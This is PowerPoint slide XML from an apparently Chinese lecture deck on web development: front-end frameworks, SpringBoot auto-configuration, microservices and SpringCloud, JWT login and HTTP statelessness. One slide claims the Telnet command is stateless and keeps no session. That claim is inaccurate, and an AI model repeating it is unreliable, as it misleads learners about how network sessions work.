      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="374015" y="4496435"/>
            <a:ext cx="6734175" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8172450" y="4208145"/>
            <a:ext cx="2155190" cy="2106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t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516255" y="673100"/>
            <a:ext cx="10699115" cy="145224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r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前端开发</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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42" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2664759" y="2155053"/>
            <a:ext cx="1550895" cy="2307185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:srgbClr val="00B0F0">
                  <a:lumMod val="87000"/>
                  <a:lumOff val="13000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="37000"/>
                  <a:satMod val="300000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前端技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>演变</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4319533" y="2226173"/>
            <a:ext cx="3383391" cy="715250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:srgbClr val="00B0F0">
                  <a:lumMod val="87000"/>
                  <a:lumOff val="13000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="37000"/>
                  <a:satMod val="300000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4320167" y="3673387"/>
            <a:ext cx="3383391" cy="715250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:srgbClr val="00B0F0">
                  <a:lumMod val="87000"/>
                  <a:lumOff val="13000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="37000"/>
                  <a:satMod val="300000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Axios</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后端技术</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文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280035" y="1203960"/>
            <a:ext cx="11297285" cy="5111115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>能做到开箱即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用？原因就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动装配了很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包依赖。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动装配？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以前在Spring使用到某个组件的时候，需要在xml中对配置好各个属性，之后被Spring扫描后注入进容器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>而有了SpringBoot后，我们仅仅需要引入一个starter，就可以直接使用该组件，如此方便、快捷，得益于自动装配机制。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是如何实现自动装配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序启动，注册配置类处理器，spring刷新上下文，执行配置类处理器扫描spring.factories将得到的BeanDefinition注册到容器，spring实例化/初始化这些BeanDefinition。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>springboot程序启动，通过spring factories机制加载classpath下的META-INF/spring.factories文件，筛选出所有EnableAutoConfiguration的配置类，反射实例化后注入到springIOC容器中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>装配最根本的思想就是利用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SPI（Service Provider Interface）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发现机制，提供服务接口，且为该接口寻找服务的实现。</a:t>
            </a:r>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SpringCloud</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86360" y="1185545"/>
            <a:ext cx="11846560" cy="5445125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>什么是微服务？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是一种软件架构风格，它是以专注于单一责任与功能的小型功能区块 (Small Building Blocks) 为基础，利用模块化的方式组合出复杂的大型应用程序，各功能区块使用与语言无关 (Language Independent），而且复杂的服务背后是使用简单 URI 来开放接口，任何服务，任何细粒都能被开放（exposed）。这个设计在 HP 的实验室被实现，具有改变复杂软件系统的强大力量。2014年，Martin Fowler 与 James Lewis 共同提出了微服务的概念，定义了微服务是由以单一应用程序构成的小服务，自己拥有自己的进程与轻量化处理，服务依业务功能设计，以全自动的方式部署，与其他服务使用HTTP API通信。同时服务会使用最小的规模的集中管理 (例如 Docker) 能力，服务可以用不同的编程语言与数据库等组件实现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>微服务的特点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、恰当的拆分：按照业务和一定的粒度进行拆分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、独立部署：每个服务独立部署，拥有自己的数据和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、自动化管理：使用自动化的方式测试、运维，做好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监控。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、统一治理：进行统一的注册、发现、路由、降级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="486410" y="3835400"/>
            <a:ext cx="9991725" cy="2676525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="1301115"/>
            <a:ext cx="10305415" cy="2393950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将业务的所有功能集中在一个项目中开发，打成一个包部署。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>优点：架构简单，部署</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成本低</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缺点：耦合度高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>维护困难，升级难</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="797560" y="3643630"/>
            <a:ext cx="9324975" cy="2733675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173355" y="1195705"/>
            <a:ext cx="11875770" cy="2448560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>微服务：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单一职责：微服务拆分粒度更小，每一个服务都对应唯一的业务能力，做到单一职责</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自治：团队独立、技术独立、数据独立、独立部署和交付</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>面向服务：服务提供统一标准的接口，与语言和技术无关</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>隔离性强：服务调用做好隔离、容错、降级，避免出现级联问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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后端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>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文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115570" y="1194435"/>
            <a:ext cx="11904980" cy="988695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SpringCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于上面的微服务的一种具体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="2028190"/>
            <a:ext cx="10315575" cy="4410075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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令牌</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2" name="标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612843" y="2849562"/>
            <a:ext cx="10541000" cy="1158875"/>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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JWT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>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758190" y="1345565"/>
            <a:ext cx="3593465" cy="5227955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874260" y="1223645"/>
            <a:ext cx="6703060" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统当用户点击登录按钮会有哪些操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159375" y="1697355"/>
            <a:ext cx="5187950" cy="4876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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445135" y="1816735"/>
            <a:ext cx="5222240" cy="3681095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大家都用过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>命令，其实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>命令就是无状态的即不维护会话信息或上下文。每次请求都是独立的，服务器在处理一个请求时，不会考虑之前的请求。这意味着每次输入的命令都是全新的请求，服务器不会保存用户的会话状态或历史命令，服务器不会存储任何关于客户端先前请求的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>同理http协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也是无状态协议即不保存状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3911600"/>
            <a:ext cx="2075180" cy="1971675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
